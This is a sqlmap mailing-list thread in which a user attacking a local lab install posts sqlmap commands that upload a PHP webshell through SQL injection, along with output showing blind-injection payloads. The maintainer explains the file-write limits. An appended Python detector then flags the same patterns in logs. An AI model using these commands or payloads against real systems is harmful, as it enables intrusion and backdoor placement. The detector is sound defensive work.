Hi.
--file-write requires union or stacked techniques to be available. In case
of --os-shell we also use the INTO OUTFILE technique, which is pretty dirty (in
most cases you can expect original results appearing in the first couple
of lines). Option --file-write in our case should produce a "clean" file.
Kind regards,
Miroslav Stampar
On Fri, Mar 21, 2014 at 4:18 AM, Brian Olson <br...@hurrikane.net> wrote:
> Hello Everyone,
>
> I'm attempting to use sqlmap to exploit a local installation of some
> software. I know it's vulnerable because it's on exploit-db & metasploit
> pops it every time (http://www.exploit-db.com/exploits/20501/). I've had
> limited success with sqlmap, but I'm at the final stage now where I'm
> trying to use the sqli's I've found to upload a webshell via sqlmap. No
> dice....I'm getting an error stating "[ERROR] none of the SQL injection
> techniques detected can be used to write files to the underlying file
> system of the back-end MySQL server." Other than the obvious, I'm not sure
> what this means because --os-shell and --os-cmd upload a file and execute
> just fine. Does --file-write need something special? Here's the output:
>
> root@kali:/usr/share/sqlmap# sqlmap -u "
> http://172.16.71.138:7879/index.php?act=auth-login&pag=login&username=admin&password=admin"
> -p "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write
> /usr/share/webshells/php/simple-backdoor.php --file-dest
> progra~1/cyclope/ni4zlja=/backdoor.php -v3
>
> ...
> [*] starting at 23:13:08
>
> [23:13:08] [DEBUG] cleaning up configuration parameters
> [23:13:08] [DEBUG] setting the HTTP timeout
> [23:13:08] [DEBUG] setting the HTTP method to GET
> [23:13:08] [DEBUG] creating HTTP requests opener object
> [23:13:08] [DEBUG] forcing back-end DBMS to user defined value
> [23:13:08] [DEBUG] setting the write file functionality
> [23:13:08] [INFO] testing connection to the target URL
> [23:13:08] [DEBUG] declared web page charset 'utf-8'
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> requests:
> ---
> Place: GET
> Parameter: username
> Type: boolean-based blind
> Title: AND boolean-based blind - WHERE or HAVING clause
> Payload: act=auth-login&pag=login&username=admin' AND 2011=2011 AND
> 'yVaP'='yVaP&password=admin
> Vector: AND [INFERENCE]
>
> Type: AND/OR time-based blind
> Title: MySQL > 5.0.11 AND time-based blind
> Payload: act=auth-login&pag=login&username=admin' AND SLEEP(5) AND
> 'OHln'='OHln&password=admin
> Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
> ---
> [23:13:08] [INFO] testing MySQL
> [23:13:08] [INFO] confirming MySQL
> [23:13:08] [INFO] the back-end DBMS is MySQL
> web server operating system: Windows
> web application technology: PHP 5.3.1, Apache 2.2.14
> back-end DBMS: MySQL >= 5.0.0
> [23:13:08] [INFO] fingerprinting the back-end DBMS operating system
> [23:13:08] [INFO] the back-end DBMS operating system is Windows
> [23:13:08] [ERROR] none of the SQL injection techniques detected can be
> used to write files to the underlying file system of the back-end MySQL
> server
> [23:13:08] [INFO] fetched data logged to text files under
> '/usr/share/sqlmap/output/172.16.71.138'
>
> [*] shutting down at 23:13:08
>
>
> The results are the same when the cmdline is changed up for a POST version:
>
> root@kali:/usr/share/sqlmap# sqlmap -u "http://172.16.71.138:7879/index.php"
> --data='act=auth-login&pag=login&username=admin&password=admin' -p
> "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write
> /usr/share/webshells/php/simple-backdoor.php --file-dest
> progra~1/cyclope/ni4zlja=/backdoor.php -v3
>
> Any thoughts on what may be happening here would be much appreciated.
>
> Thanks,
>
> Brian
>
>
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
--
Miroslav Stampar
http://about.me/stamparm
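
Added example (not part of the original thread and not sqlmap code): a small detector a defender could run over web server access logs to flag the request patterns discussed here, namely the boolean-based and time-based blind payloads from the quoted output and the INTO OUTFILE file write mentioned in the reply. The log lines are constructed, and the names `PATTERNS`, `classify` and `scan` are assumptions made for this sketch.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the techniques named in this thread (illustrative, not exhaustive).
PATTERNS = {
    "file_write": re.compile(r"\binto\s+(?:out|dump)file\b", re.I),
    "time_blind": re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I),
    "boolean_blind": re.compile(r"'\s*(?:and|or)\s+(\d+)\s*=\s*\1\b", re.I),
    "stacked": re.compile(r";\s*(?:select|insert|update|delete|drop|create)\b", re.I),
}

# Request field of a Common Log Format line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD|PUT) (\S+) HTTP/[\d.]+"')

def classify(line):
    """Return the set of technique labels whose signature appears in the query string."""
    match = REQUEST_RE.search(line)
    if not match:
        return set()
    # Split off the query string first, then decode it once as the server would.
    query = unquote_plus(match.group(1).partition("?")[2])
    return {name for name, rx in PATTERNS.items() if rx.search(query)}

def scan(lines):
    """Return (line_number, sorted labels) for every line that matched a signature."""
    hits = []
    for number, line in enumerate(lines, start=1):
        labels = classify(line)
        if labels:
            hits.append((number, sorted(labels)))
    return hits

# Constructed access-log lines; the first two reuse the payload shapes quoted above.
_PREFIX = '172.16.71.1 - - [21/Mar/2014:23:13:08 +0000] "GET /index.php?act=auth-login&pag=login&username='
SAMPLE_LOG = [
    _PREFIX + 'admin%27%20AND%202011%3D2011%20AND%20%27yVaP%27%3D%27yVaP&password=admin HTTP/1.1" 200 512',
    _PREFIX + 'admin%27%20AND%20SLEEP%285%29%20AND%20%27OHln%27%3D%27OHln&password=admin HTTP/1.1" 200 512',
    _PREFIX + 'x%27+INTO+OUTFILE+%27placeholder.txt%27--+&password=admin HTTP/1.1" 200 512',
    _PREFIX + 'admin&password=admin HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for number, labels in scan(SAMPLE_LOG):
        print(number, labels)
```

Request bodies, as in the `--data` (POST) variant quoted above, do not appear in access logs, so the same `classify` logic would need the body from a WAF or application log.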